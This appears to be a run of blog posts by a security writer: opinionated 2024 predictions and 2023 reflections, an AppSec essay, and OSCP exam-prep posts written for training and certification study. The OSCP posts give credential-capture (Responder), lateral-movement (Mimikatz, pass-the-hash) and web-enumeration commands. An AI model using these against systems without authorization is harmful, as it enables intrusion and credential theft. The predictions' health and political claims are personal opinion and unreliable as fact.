This year I’ve also added a subsection for each category with resources that are informing my predictions. This subsection is intended to provide you with more insights and connections for how the predictions fit together, including a few (and sometimes several) links to news articles, blog posts, and other content that led to this year’s predictions.
With that - thank you once again for stopping by to read my random musings 😄
And as with last year’s predictions post, a word of warning: I tend to focus on negative trends when it comes to history and world events, so I think you’ll find my predictions largely err in that direction. Likewise, as an American you’ll find my predictions are heavily influenced by philosophically Western views. If you’re looking for cupcakes and unicorns in my predictions for 2024 - you’ll probably be disappointed, and should maybe skip to the section on Hope 😅 For those not easily disheartened, read on at risk of gazing into the abyss.
🔳 OpenAI announces the release of GPT-5
🔳 Major technology companies replace over 1000 workers with AI
🔳 At-least one deepfake political advertisement is publicly aired during the United States elections
🔳 OpenAI loses at-least one copyright infringement court battle (and then appeals to a higher court)
🔳 An Open Source Large Language Model (LLM) achieves GPT-4 levels of performance
What’s inspiring these predictions: The rapid pace of developments in Artificial Intelligence (AI) over the last year have been astounding. In little more than a year we went from having ChatGPT running on GPT-3.5 to GPT-4, and then both Google and Meta announced significant improvements to their own models. Given the insane series of events related to Sam Altman’s position at OpenAI, I suspect they also have something cooking that we’ll see an announcement about next year.
Likewise, given how powerful AI is becoming, we’re already seeing companies like Google supposedly replace workers with these new technologies. It isn’t too far-fetched to think that other companies will follow suit if interest rates remain high. It’ll also be interesting to watch how copyright infringement lawsuits play out in 2024 after seeing how frequently AI art generators seem to reproduce copyrighted works.
🔳 India experiences at-least one day where the heat index reaches 140 degrees Fahrenheit
🔳 The continental United States experiences at-least one day where the heat index reaches 130 degrees Fahrenheit
🔳 At-least one Category 5 hurricane strikes the continental United States
🔳 The Panama Canal is closed due to a lack of rain for at-least 5 days
🔳 The average price of coffee will exceed $7 per pound
Why I’m making these predictions: As Brazil recently experienced a heat index over 137 degrees Fahrenheit before their Summer season even started, I think that it’s very likely we’ll see similar heat waves crash over both India and the continental United States in 2024. The highest heat index in the U.S. in 2023 reached 125 degrees Fahrenheit, and with global warming showing no signs of slowing down - 2024 is shaping up to be the hottest year on record.
Likewise, with the immense heat being absorbed by the world’s oceans, it’s only a matter of time before we see significant weather pattern changes with devastating impacts to human life and property. In 2023 we saw a world-first occurrence where every tropical ocean saw a Category 5 hurricane, and the Panama Canal has become so dry due to a lack of rain that companies are paying millions of dollars to get through. These warmer temperatures are also reducing coffee yields, which in turn drives the cost even higher.
🔳 At-least 25% of Americans will be disabled from COVID-19 (i.e. Long COVID)
🔳 The U.S. Government passes proposed changes to reduce the number of people with disabilities found in the census
🔳 COVID-19 evolves to completely escape the immune system response
🔳 China reinstates universal mask mandates to slow the spread of COVID
🔳 Governments start to recognize the financial loss COVID is having on the economy and reinstate safety regulations
What’s leading to these predictions: In 2023 we learned that at-least 14% of Americans have Long COVID, and since both the U.S. Government and the general populace insist that it’s no worse than the seasonal flu (it’s actually 50% more fatal than influenza) there seem to be very few people getting immunized - let alone taking precautions (like wearing a mask). And although it’s still open for public comment, it is becoming abundantly clear that the U.S. Government does not want to recognize the growing train wreck they’ve created by letting COVID-19 run rampant throughout the country.
And since COVID-19 already significantly damages the immune system, I suspect more governments will be driven to implement universal mask mandates as the virus continues to evolve. Thankfully some countries are waking up to the fact that growing rates of Long COVID are significantly impacting their economies, which may spark new life into safety regulations for both medical settings and public transit.
🔳 At-least one act of domestic terrorism occurs at a political event and/or polling place during the United States elections which makes global headlines
🔳 Ukraine retakes Crimea through the use of American arms and munitions
🔳 Iran and Syria go to war with Israel over the massacre of Palestinian civilians
🔳 China invades Taiwan
🔳 Ukraine fights to a stalemate with Russia in the Donbas and Luhansk regions
What’s driving these predictions: As unsettling as it is, more Americans say they support political violence as we head into the 2024 election season. As a result of political turmoil boiling over in the United States, state ators will take advantage of the ensuing chaos to settle old scores. We know that President Xi Jinping has already stated his intentions to take over Taiwan, and coordinated actions (by way of Russia) with Iranian and Syrian forces striking Israel could be the opening that China needs.
Unfortunately, I believe that global conflicts will further distract from the war in Ukraine - which will further hinder Ukraine’s ability to reclaim the Luhansk and Donbas regions. I am personally very hopeful that Ukraine will retake Crimea in 2024, which I believe will have significant implications for Russia’s will to continue the fight.
🔳 Mounting commercial real estate losses lead to significant cuts in Federal interest rates
🔳 Businesses force staff back to the office at-least four days a week
🔳 The United States Government fully eliminates remote work as an option for federal employees
🔳 Ozempic and other $NAME drugs become severely restricted due to their financial impacts on major retailers
🔳 Core inflation remains above 2.75% in the United States
What’s leading to these predictions: Empty office buildings are allegedly threatening the economy, and it’s leaving big banks holding the $1.5 Trillion dollar bag (won’t someone think of the shareholders? 🙄). Because of this President Biden is already forcing federal employees back to the office more frequently - even though they’re probably spending a majority of their time on virtual meetings with people in other offices… Anyway - I’m sure you see where I’m going with this.
Aside from commercial real estate woes and CEO’s wanting to reinstate feudalism, the impacts to capitalism that GLP-1 drugs (such as Ozempic, Wegovy, and Mounjaro) are having is clearly alarming investors. Lord knows we can’t be scaring the rich by treating people for the negative effects consumer capitalism has had on their lives 🙄 and to make up for these losses, I suspect corporations will continue the price gouging behaviors we saw in 2023 - which will sustain inflation above 2.75% next year.
🔳 A Top 10 technology company experiences a major security incident attributed to non-state actors
🔳 A Form 8-K breach notification filing with the Securities and Exchange Commission (SEC) leads to a 10% drop in a publicly listed company’s stock value
🔳 At-least one CISO will face charges of fraud from the SEC due to a security incident
🔳 A United States utility company is hit with ransomware with service to customers is impacted
🔳 A major Israeli security company experiences an impactful security incident attributed to a state actor
What’s inspiring these predictions: 2023 was rife with security incidents, and I suspect we’re going to start learning about a whole lot more of them now that the SEC requires form 8-K to be filed within four business days of a security breach. With how big of a target the MANGA+ companies are, it’s entirely possible that we could see the first two predictions occur simultaneously.
Beyond that, I believe the SEC is just getting warmed-up when it comes to going after corporate leaders for failure to properly attest to the state of their cyber security practices. Moreover, given how frequently utility companies seem to be in the news for security incidents - it’s entirely possible that one such publicly traded company’s CISO could find themselves in the hot seat after a widely reported customer-impacting incident.
Finally, in conjunction with my Global Conflit predictions, I suspect at-least one of the major Israeli cyber security companies will be successfully targeted by state actors looking to incur financial damage - or to further compromise the Israeli security company’s customers.
🔳 Twitter is sold at a significant loss to new ownership
🔳 Amazon replaces at-least 25% of their warehouse workforce with robots
🔳 Portable nuclear reactors start being mass-produced
🔳 A lucid dreaming device becomes commercially available for use
🔳 Non-screen based connected devices (think Humane’s AI pin) will totally flop
What’s generating these predictions: Twitter is flailing after a year under Elon Musk’s leadership, and the outbursts have only become more erratic as the year progressed. At this point I can’t see it ending any other way than a write-off sale to a new owner. Sadly I don’t think it’ll ever return to being what it was now that it’s turned into a virtual incel nazi bar 🤷
Moving on - now that Amazon has started testing humanoid robots in warehouses I fully expect them to ramp-up their use in 2024. If I had to guess, they’ll probably start with the unionized locations. If they can somehow manage to pair it these robots with portable nuclear reactors for power generation, then they just might blow past the 25% prediction.
As for Amazon’s non-warehouse workers (and probably Wayfair’s workers, too) the new year brings the prospect of being made to write code while you sleep through lucid dreaming. Personally I was hoping for something a little less dystopian that would allow me to experience an Isekai anime lifestyle. Speaking of gadgets - I’m totally expecting the Humane AI pin to flop. Way too much content is oriented around screens, and the world feels like it’s becoming far too dystopian to make people want to stop and look around.
🔳 A universal COVID-19 vaccine that prevents infection is discovered
🔳 Masks (once again) become universally required in medical settings in the United States
🔳 Donald J. Trump is prevented from running for office due to criminal conviction(s)
🔳 Russian aggression in Ukraine come to an end after Vladamir Putin suffers a life-threatening illness
🔳 The United States produces more than 47% of its energy from zero-carbon sources
Why I’m still hopeful: Honestly I don’t have much to go on here other than the fact that these are things which I continue to hold-out hope for. Preventing infection continues to be the only means by which one can avoid the risks of Long COVID, and it would be really great to see a universal vaccine produced that the virus can’t out-evolve. In the mean time, five states have returned to mask mandates in hospital settings - now we just need more states (and countries) to do the same!
On an entirely separate note, I think the world could find itself in a much more peaceful state if the United States elections aren’t as volatile as they’re shaping up to be. A new Republican candidate for president on the ticket would certainly help us take a few steps back from falling over the precipice of Authoritarianism. Who knows, it might even cause Vladimir Putin to get so mad he comes down with a life-threatening illness - maybe even a fatal encounter with gravity!
Finally, we all know that climate change is rapidly accelerating - it would be pretty amazing if we could make meaningful progress toward adopting zero-carbon sources for energy with haste.
Thank you once again for stopping by 😊 While taking some time to rest and prepare for what’s in store for next year, you can git checkout
other (usually off-topic) content I’m reading over at Instapaper - or review my series on the DevSecOps Essentials which (sadly) continues to be relevant guidance for many companies. Here’s hoping we turn things around in 2024!
And until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thank you once again for reading this content!
]]>And as with last year’s predictions post, a word of warning: I tend to look for negative trends when it comes to history and world events, so I think you’ll find my reflections will largely err in that direction. Likewise, as an American you’ll find my reflections are heavily influenced by philosophically Western views. If you’re looking for cupcakes and unicorns in my reflections on 2023 - you’ll probably be disappointed and should maybe skip this post 😅 For those not easily disheartened, read on at risk of gazing into the abyss.
While the media’s silence on COVID-19 regarding the serious effects it has on people’s lives continued in 2023, we now know that at-least 14% of Americans have Long COVID. Unfortunately, this has also led to a few of my predictions coming to pass:
✅ Spawning even more infections variants of COVID-19
✅ Second-order outbreaks of other infections diseases
✅ Second-order effects in China hindering their economy after adopting a Western-style mass infection strategy
I’ll have more to say on this in my upcoming “Predictions for 2024” post, but sadly it feels as though we’re heading toward an even darker place as it relates to COVID-19 and the way both governments and the general populace are thinking about this debilitating virus.
Hint: COVID-19 is 50% more lethal than influenza (”the flu”), which everyone keeps thinking it can be compared to.
I expected China’s COVID-19 mass infection strategy to have significant impacts in 2023, and surprisingly we didn’t hear much about this. If the things I read online this year are at-least somewhat representative of people’s behaviors on the ground in China, the reason the impacts I predicted didn’t materialize can be traced to the population continuing to take precautions against the virus - even without their Government’s requirement to do so.
That said, here’s how my predictions stacked up this year:
❌ Significant supply chain impacts from China’s COVID-19 mass infection strategy
✅ Long COVID leading to worker replacement economic impacts
As a result of hanging my predictions off the expected impacts of COVID-19 running rampant in China - which didn’t materialize to the extent that I thought they would - we thankfully avoided one of my predictions for 2023, while others hit the bullseye:
❌ Inflation continues to run amuck at high single-digit percentages
✅ Financial markets experience downward pressure as federal banks raise interest rates
✅ Corporations continue to report record profits
Here I once again can see the folly of hanging my predictions off China’s mass infection strategy. The first prediction in this section was also something I expected would cascade into my second prediction - but neither came to be:
❌ Lead times for core networking infrastructure continues to increase
❌ Cloud adoption scales as datacenter hardware becomes expensive / hard to acquire
I’ll have more to say on this in my “Predictions for 2024” post, but if China invades Taiwan I think all bets are off in sectors involving semiconductors and CPU / GPU chips. There’s still time (and increasing likelihood) for these predictions to become true - just not in 2023.
It’s a surefire bet every year that data breaches will happen - and this year we witnessed some very large incidents indeed. Even so, the reason I predicted more data breaches would occur was largely because I expected more companies to bring insecure software to the cloud. Turns out companies were already using badly insecure software in the cloud due to commercial, off-the-shelf products. I think I at least deserve some partial credit here under the circumstances:
✅ / ❌ Historic volume of data breaches and security incidents (but not for the reason I proposed)
Of the categories that I had the most hope for this year, this one had the greatest positive outlook when the year started - and the most bleak outlook as we come to the end of the year with plenty of thanks to authoritarian (some might even say fascist) influences. Thanks, American Republicans and Viktor Orban!
❌ Ukraine takes back Crimea
❌ Putin falls out of a very high window (but we were so close!)
❌ Putin goes Nuclear in Ukraine (I’m glad to be wrong about this!
❌ China invades Taiwan (but still in the cards for 2024)
The world broke all kinds of (very bad) climate records this year - and while I was wrong about a very specific prediction, the general trend we’re heading in is bad indeed:
✅ Catastrophic climate events [1] [2] [3]
❌ Hoover dam reaches “dead pool” level
There’s plenty more to be said here about what we should expect in 2024, but I’ll save that for my next blog post. In the mean time, I’ll just leave this here: utility firms are paying builders to install gas appliances in homes.
Of the things I hoped for, only the one prediction I really didn’t want to see happen took place (thanks, capitalism). That said, I really would have liked to see us break the cycle of mass infection regarding COVID-19, which will inevitably lead to a whole host of negative outcomes that we’re just now starting to see play out (in spite of how much governments would like us to ignore the virus behind the curtain). More to come on this in my next blog post.
✅ Corporations continue price gouging in spite of lower interest rate increases
For those keeping score, here’s how things turned out with my predictions for 2023:
✅ Ten accurate predictions
❌ Ten inaccurate predictions
Womp womp 🎺 so my predictions for 2023 were no better than a coin toss. Personally, I blame my over-reliance on predicting the impacts of China’s COVID-19 mass infection strategy for a cascade of missed predictions - and will definitely take this into account when I write my “Predictions for 2024” blog post later this week.
In the mean time, thank you again for stopping by to read my pseudo-random musings 😊 While taking some time to rest and reflect here at the end of 2023, you can git checkout
other (usually off-topic) content I’m reading over at Instapaper - or read my series on the DevSecOps Essentials which sadly continues to be worthwhile guidance for many companies. Here’s hoping we turn things around in 2024!
Until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thank you once again for reading this content!
]]>This year’s “Great Reads” is filled with a multitude of fun, useful, enjoyable, interesting, concerning, and sometimes downright enraging content. Needless to say, there’s an abundance of food for thought across multiple topics of interest (and importance) - and like a buffet, I encourage you to try a little bit of everything.
Enjoy!
As always, thanks again for browsing through another year’s “Great Reads” 😊 While I prepare my next blog post reflecting on my Predictions for 2023, you can git checkout
other (usually off-topic) content I’m reading more regularly over at Instapaper.
Until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thank you once again for reading this content!
]]>At first, I thought that getting back into hacking web apps would be easy. After-all, five years ago I ranked amongst the Top 100 security researchers on Bugcrowd (my highest rank was 64th) and was named as one of the MVP’s in 2018. How hard could it be?
Well, I hadn’t accounted for the fact that my web hacking skills had become dull and rusted without practice - and I certainly hadn’t considered the fact that securing web applications has become a lot easier for companies to implement. Cloud Web Application Firewalls (WAFs) and Runtime Application Security Protection (RASP) technologies offered by Content Delivery Networks (CDNs) have become a lot more ubiquitous. Being a successful bug bounty hunter requires a lot more skill in 2023 - so if you’re struggling, I’m right there with you!
To get a jump on learning about newer bug bounty hunting techniques, I reconnected with my sensei (Jason Haddix) and signed up for his Bug Hunter’s Methodology Live Course. I credit Jason for a lot of my early success in the Bug Bounty scene; working for him at Bugcrowd exposed me to a lot of his out-of-the-box thinking and techniques. I count myself fortunate to have built a great friendship with Jason, which continues to this day ❤️
Anyway, Jason’s two-day course is absolutely packed with the kind of “secret sauce” techniques that allowed me to hit the Top 100 back in 2018. He’s also added a ton of updated content related to new tools and techniques he’s adopted - including access to homegrown scripts, as well as techniques leveraging novel Artificial Intelligence (AI) technologies.
Whether you’re just starting out on your Bug Bounty adventure or looking to up your game - you can’t go wrong with spending $550 on this course - and you’ll get 5% off if you use this link 😉 The course will certainly pay significant dividends throughout your hacking career, and you’ll definitely learn a ton if you spend 16 hours with Jason (along with the special guests he invites to present) during the live course.
This content was written by a human being; If you find it useful, enjoyable, or influential you can support my work via Patreon.️ As always, thank you for being here and reading this content! 😊
After taking Jason’s course, the next thing I started doing was diving into API security testing - and to me, this space still feels like a new frontier in AppSec. Firstly, there aren’t any clear-cut “winners” in this space from a security products perspective (yet). And secondly - if I’m being candid - it’s still not an area most application / product security teams are spending time on right now. This is partly because there aren’t many well-known security technologies in the space, and partly because most security professionals still don’t know how to write software - let alone build relationships with their development teams.
Regardless, to skill-up in this space I signed up for APISec University’s API Penetration Testing course, where I recently earned a certificate; I will fully admit that I listened to Corey Ball’s training sessions on 1.25x speed in order to keep from getting bored 😅 I guess I’m just a little too “New England impatient” sometimes 😬
Anyway - as far as free courses go, this one was pretty good. Corey walks students through setting up Burp Suite Community, Zed Attack Proxy, and Postman - as well as a couple of open source vulnerable web apps to practice with. If there was one thing I think this course could have improved upon, it would be spending more time in the vulnerable web applications to get more hands-on practice for the section quizzes. This is definitely something I feel like I should probably go back and do regularly to stay sharp with my new set of skills.
I am super excited by what PortSwigger has put together with their Web Security Academy learning modules. It has never been easier to pickup Application Security skills for free 🎉 The new learning paths for Server-side Vulnerabilities and SQL Injection are particularly well-built in terms of their ability to provide concise bundles of knowledge, along with links to useful resources and tightly scoped practical labs.
I’m a huge fan of the hands-on learning approach that PortSwigger has implemented with these trainings - and I am doubly thankful that they have solution walkthroughs for those times when I get stuck. Those moments between getting frustrated and getting that one little hint I need in order to keep making progress is where I find the learning really happens for me. Whether it’s practicing unfamiliar techniques or figuring out new ways to use Burp Suite, I am frequently going back and making notes on additional questions to ask myself when performing security assessments.
Last, but certainly not least in my training regiment has been the Critical Thinking Bug Bounty podcast. Listening to Joel and Justin talk about the interesting techniques that they’re using, learning, or reading about gives me a ton of energy and drive to keep practicing and learning new techniques in this space.
It’s also really helpful that Joel and Justin interview guests from time-to-time on the podcast, as it exposes listeners to new ways of thinking about hacking, as well as new tools and techniques to learn more about when bug bounty hunting. Don’t sleep on this podcast if you’re looking to expand your learning opportunities!
As always, thanks again for stopping by to read my pseudo-random musings 😊 While I draft my next blog post, you can git checkout
other (usually off-topic) content I’m reading over at Instapaper - or go back and read my other OSCP content for additional tips-and-tricks.
Until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thank you once again for reading this content!
]]>That one simple trick: Communicating regularly with developers!
And before anyone claims they’re already doing this: telling developers to fix the vulnerabilities your tools are finding does not count as “communicating”. Here’s a few questions worth asking to determine if you’re actually communicating with developers:
I can’t tell you the number of times I’ve heard security professionals claim that fast scans are required by their development teams. But here’s the thing - unless your business is operating like Netflix or Shopify and releasing code directly to production after passing automated tests, this really does not apply to your situation. And if you don’t believe me - here’s a question for you:
Does your development team require a code review before merging new code?
If your company is using the same “best practices” as most other companies, the answer is almost certainly “yes”. And if the answer is “yes”, it begs the next question: how long does it take for a pull request to receive a code review? Hours? Days? If that’s the case, then so long as the developer still has a good context of the code that was scanned - meaning within a reasonable amount of time - then faster scans hardly make a difference.
But you know what will make a difference in slowing down the development process? The amount of bullshit findings your scanning tools produce.
If there’s one universal law when it comes to security tools, it’s this: you’ve got speed, accuracy, or completeness - and you can only choose two.
The unfortunate thing about pretty much every tool on the market today that optimizes for speed is that they try to make it really easy for security teams to use without considering developer impacts. As a result, such tools almost always dump a mountain of findings on your developers. Sure, these tools are “accurate” in that they’ve found a bunch of things wrong in the code - but they rarely seem to take into account the threat model associated with their findings. Oh no! You can generate a SQL injection by changing a database table name in the configuration file! Anyway…
When it comes to scan speed, you played yourself - because the scan took five to ten minutes producing these kinds of findings; Now you’re going to spend hours in meetings across several weeks discussing finding validity. This is how security teams hold up the development process. Security’s five to ten minute scans often prevent developers from moving onto the next project, and impacts their OKRs / KPIs.
Meanwhile, during all that time sending passive aggressive emails back-and-forth regarding the validity of the security findings, very little is getting fixed - and the business is no more secure now than it was when the findings were produced. The only thing being impacted here is the Development team’s productivity. It’s no wonder they’re pissed off at security teams.
By now I’m sure some of you are thinking - why don’t we just tell the Developers what to fix? And sure, you could spend time reviewing the findings on behalf of the developers - but what leads you to believe that the two to five Security Engineers reviewing thousands of findings are going to be any faster than modern security tools at eliminating hundreds (and sometimes thousands) of false positives? Manually reviewing security findings is an incredibly poor use of time for expensive security resources.
Likewise, if we think telling developers they need to use certain tools (without considering their input) is going to somehow magically solve the problems outlined above, we’re kidding ourselves. More often than not this practice just leads to development teams delaying security scans until it’s too late to stop their momentum - and any attempt to try and delay things further only leads to the wrath of an Engineering VP crashing down on Security’s doorstep.
So how can we avoid all of this back-and-forth in the first place? It’s simple: by communicating more frequently with development teams.
Start by asking yourself these (and similar) questions:
When Security spends time building trusting relationships with Engineering teams, a ton of potential can be unlocked to streamline development and security processes. One of the first things you should do to build trust is ask Engineering teams to participate in conversations involving the selection of Security tools.
Your development teams have experienced first-hand the kinds of pain Security tools can cause, and there’s no one better to help figure out the best way to implement Security tools than the teams who will be responsible for using them. This is doubly true if the Engineering team knows that it will be migrating to a new platform - since the Security team will need to figure out how to support the new platform after the move. Having an early warning here will help avoid costly investments (in terms of time, money, and people) that end up being useless after such changes.
More importantly, security teams need to take action on the feedback that developers provide as it relates to the security tools. The moment we start ignoring these important voices in the process is the moment we begin to lose the trust and goodwill of our colleagues. If your development team is complaining because the security tool you’ve implemented quickly produces a load of garbage results, listen to them! Ask for their support in tuning the tool - or even better, ask them to participate in the selection process for a new tool!
A lot of people talk about building Security Champions - and taking action on feedback by inviting developer participation is your best opportunity to do just that!
If Developers generate Technical Debt, then AppSec generates Security Delay. The best we can hope for is to reduce that delay by removing as many false positives as we can from the results of our tools - and by getting developers to use the tools more often.
The whole process starts by collaborating with development teams to implement the right security tools in the right locations along the Continuous Integration / Continuous Delivery (CI/CD) journey. Although if I’m being honest, very few companies actually practice Continuous Delivery - it’s more like Continuous Integration / Periodic Deployment.
Anyway, as I was saying earlier - if we want developers to use the tools we select, there’s no better way to improve adoption than by including them in the selection process. If Development teams have skin-in-the-game when it comes to the quality of the tools selected, they will help you select tools that produce fewer false positives. Developers are also more likely to remediate the findings produced by tools they helped select - and will sometimes jump in to help tune things if necessary!
You can’t do DevSecOps without doing DevOps - and DevOps is just communication, coordination, and collaboration.
Moreover, communicating regularly with Developers doesn’t require a line in the budget - and gathering their input when selecting Security tools dramatically improves both security tool adoption and security finding remediation rates.
So what’s stopping you from 10x’ing your AppSec Program?
Thanks again for stopping by to read my pseudo-random musings 😊 While I draft my next blog post, you can git checkout
other (usually off-topic) content I’m reading over at Instapaper - or review my other posts on DevSecOps” for lessons learned from my practical experience in a Fortune 100 global enterprise.
Until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who already support this content!
]]>… and then I took the exam again a month later - and this time, I passed . This post is about how I turned things around in just 30 days in order to become an Offensive Security Certified Professional, and it all starts with having a really solid playlist to listen to while hacking. And with that queued up - let’s do this!
One of the ways the Offensive Security team raises the level of difficulty on the exam is to throw in a lot of avenues for students to attack. It’s important to quickly discern what represents a real opportunity to gain a foothold on the target system, and what things have been thrown in to waste your time. There are a few questions you can ask yourself when enumerating a system with a lot of open ports:
anonymous
FTP on port 21
, or telnet
on seemingly random ports that my recon process found?/etc/hosts
file with the computer name? Have I browsed to HTTP and HTTPS versions of the site on those other HTTP ports?\\ip-address\sharename\filename
? Have I setup Responder with the following (exam-allowed) syntax to exercise the app in this way:
sudo responder -I tun0 -v -A
8099
and/or 9099
)? Have I looked through searchsploit
to see if anything sticks out as remotely exploitable?Usually by the time you’ve ran through such questions, you’ll probably have found a path forward. Know that on the OSCP open attack paths are not a mistake - so if your gut is telling you that some particular foothold is the path forward, then follow it until the end.
And most importantly - if you hit a wall and nothing you’re doing is working, then either you’ve chased the rabbit hole to the end, or you need to take a break / pivot and come back to it later. So long as you have taken good notes on what you’ve tried so far, and what you might like to try when you get back to it, then it’s okay to move on and come back to the target later on.
In the coming weeks I’ll be publishing a blog post (or possibly two) on the specific things I look for when attacking a Windows machine - but the most important things to remember is that at least 50% of your targets on the OSCP exam are going to be Windows machines. Gaining Administrator on the Domain Controller system is required to pass the exam. Spending lots of time getting comfortable with Windows systems - especially when you’re stressed and facing time constraints during the exam - is going to be worth it.
To help you get a leg-up on the process of obtaining nt authority\system
privileges, I recommend taking a good look at Windows Privilege Escalation Awesome Scripts, as well as Guifre Ruiz’s Windows Escalation of Privilege notes. Being able to recognize Unquoted Path, insecure backups, and DLL Hijacking opportunities at-a-glance are going to make the process of hacking Windows systems that much easier.
Then, when it comes to lateral movement, knowing exactly which Mimikatz commands to run and having those ready to copy-and-paste from your notes will save you a ton of time. You’ll then need to know how to make use of those credential hashes - whether by cracking them with Hashcat, or using Pass-the-Hash / Ticket techniques with tools like impacket-psexec
, evil-winrm
, or xfreerdp
. If you’ve done your recon, it should be pretty obvious which tools and techniques you’ll need to use when moving laterally into the next Domain machine.
This content was written by a human being; If you find it useful, enjoyable, or influential (and have the coin to spare) - you can support my work via Patreon.️ Thank you to those who already support this blog! 😊 And now, back to that organic content you were enjoying! 🎉
The time constraints on the exam are there to add a certain amount of stress - which is intended to test how well you actually know what you’re doing. On my first attempt it took something like 3.5 hours for me to gain nt authority\system
privileges on the exposed Active Directory machine. On my second attempt, it took me 2.5 hours to achieve the same outcome. After that it took me another 5 hours of hands-on-keyboard effort to gain nt authority\system
access on the 2nd machine. Four of those five hours were spent running into a wall before I stopped for the night and got some sleep.
You see, every night after having dinner with my wife and watching a T.V. show, I would go back upstairs to practice in the PEN-200 labs around 7:00 p.m. - I had built up a habit of thinking about hacking for at least a couple of hours before going to bed. Having this regular routine made my first exam attempt feel a little more familiar - and made my second attempt feel natural.
Getting four hours of sleep that night, taking a refreshing shower in the morning, and having a relaxed breakfast afterward helped set the pace for the rest of the exam. It took me less than an hour after getting back to the keyboard to gain Administrator on both that machine from the night before, as well as the Domain Controller. At that point I had 12 hours left on the exam and 40 points accumulated toward my final score.
The lesson here is that it’s super important to take breaks, get some sleep, and eat properly. But more than that - having a routine that you follow leading up to the exam will help you identify the best time for you to schedule your exam attempt; for me that was 7 p.m. Eastern time.
Every time I completed a “goal” (gaining Local or Administrator access), I would stop to make sure I had all of the commands written down and screenshots I needed for evidence, and then kick-off my automated tools for Privilege Escalation and/or Lateral Movement. While these were running, I would take a 10-15 minute break to go to the bathroom, grab a snack, fill my water bottle, and share news on my progress with my wife. Between her encouragement and the chance to step-away and think, I felt modestly rejuvenated and eager to proceed every time I sat back down at my keyboard.
I would likewise take a short break when I hit a wall and needed to reset. This was a good opportunity to reflect on what I had tried so far, and to ask myself whether I should pivot to something else or if I felt like I had enough options in front of me to keep going. Toward the end of the exam I started setting loose targets on what I wanted to accomplish with my remaining time.
Ultimately I ended up spending something like 3 hours on a stand-alone box that I only ever got Local user access on before pivoting back to a stand-alone box that I had initially started early in the day and quickly pivoted away from. When I pivoted back to that original stand-alone box from earlier in the day, it was like my entire mindset had somehow done a backflip - because I quickly gained not only Local user access, but Administrative access shortly after the pivot.
Sometimes, all your brain really needs is a change of perspective for the gears to go into motion. My strategy for approaching the exam was as follows:
This content was written by a human being; If you find it useful, enjoyable, or influential (and have the coin to spare) - you can support my work via Patreon.️ Thank you to those who already support this blog! 😊 And now, back to that organic content you were enjoying! 🎉
Some of the best advice I received prior to taking the exam was to start writing the report before my access to the exam lab ended (thanks Craig!). This helped guarantee that I had all of the screenshots I needed for both Local and Root / Administrator proofs for all of the boxes I had pwned. It also allowed me to make sure the screenshots I had taken accurately reflected the commands and steps I used to obtain access to the machines.
In terms of how I went about writing my report, I used a Notion template shared with me by c0nsid3rate. This made the entire process a LOT easier, and the final document was only 4.1 MB in size after adding 47 screenshots and writing 55 pages of documentation.
Working from a template will prompt you for things you need to include on the report in order to pass the exam - so don’t skip the process of looking over the official Offensive Security report template examples before you start writing your report.
By the time I stepped into my second exam attempt, I had already gained root / administrator privileges on forty of the PEN-200-2022 lab machines, eighteen of the PEN-200-2023 lab machines, and completed 94% of the chapter exercises. In the process I had earned 10 bonus points for the exam, and built a wealth of experience along with a mountain of notes to show for it. Those 10 bonus points make a huge difference come exam day - because it means you only need the Active Directory set and two Local user shells on the stand-alone boxes to earn enough points to pass the exam.
And as I said in my very-first blog post in this series: practice is the difference between wanting to be a 1337 H4x0r, and actually becoming one. The only way you’ll really know what to look for, what steps to take, and what attack vectors to pursue is by putting in the work - and that means getting in the lab and practicing every week.
As always, thanks again for stopping by to read my pseudo-random musings 😊 While I draft my next blog post, you can git checkout
other (usually off-topic) content I’m reading over at Instapaper - or go back and read my other OSCP content for additional tips-and-tricks.
Until next time, remember to git commit && stay classy
!
Cheers,
Keith // securingdev
If you found this post useful or interesting, I invite you to support my content through Patreon 😊 and thanks once again to those who already support this content!
]]>That said - as I stated in my original “Hacking the OSCP” blog post: there is no substitute for practice. Or doing the exercises. Or spending some time reading through chapters on content you’re less familiar with. The notes shared in this post represent the most useful and repeatable steps within my process - but are by no means comprehensive. The only way to truly build the habits and confidence you need in order to be successful is to do the work.
When I first discover open ports 80, 8080, 443, 8443, 3306, etc. as part of my recon process one of the first tools I run is Nikto:
nikto -host=http://website-ip/or-domain -maxtime=30m -o <output-file>
Depending on the type of site (like if it’s a WordPress website) I would instead run WPScan:
wpscan --url http://website-ip/or/domain -U 'username1,username2' --enumerate u
Regardless of the type of site, I’ll usually try running some directory busting tools such as dirb, gobuster, and ffuz:
Using dirb (-r to scan non-recursively, -z # to add ms timeout):
dirb http://<site-address> -r -z 10
Using gobuster for directory discovery:
1
2
3
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt \\
-s '200,204,301,302,307,403,500' -u http://<ip-address> | \\
tee -a <filename>
gobuster file / endpoint enumeration
1
2
3
gobuster dir -u http://<ip-address>/ \\
-w /usr/share/seclists/Discovery/Web-Content/CGIs.txt \\
-s '200,204,301,302,307,403,500' -e | tee -a <filename>
ffuf fuzzing directories recursively
1
2
3
4
ffuf -c -w \\
/usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt \\
-u <http://$IP>:$PORT/FUZZ -recursion -recursion-depth 2
While my automated scans are running in a terminal screen
session, I’m usually walking the site manually with Burp Suite proxying requests so that I better understand the layout of the site. Here are a few things I look for:
What information can I gather from the URL?
.jsp
.do
.html
(Java) and.php
all tell you a lot about what language(s) are being used
Using the Browser Debugger
ctrl
+shift
+K
for Firefox (or Web Developer menu)
Looking for hidden values / fields
Search for
input
’s in the source code
Take a look at the Response Headers
Debugger →
Network
tab →Headers
sub-tab
Inspect Sitemaps
curl https://<site-address>/robots.txt
curl https://<site-address>/sitemap.xml
Get site version information
curl -i <ip-address>
Reading the website in Terminal
curl <ip address> -s -L | html2text -width '<numb>" | uniq
Common Administration console locations
/manager/html
for Tomcat → MySQL
/phpmyadm
for phpMyAdmin panels
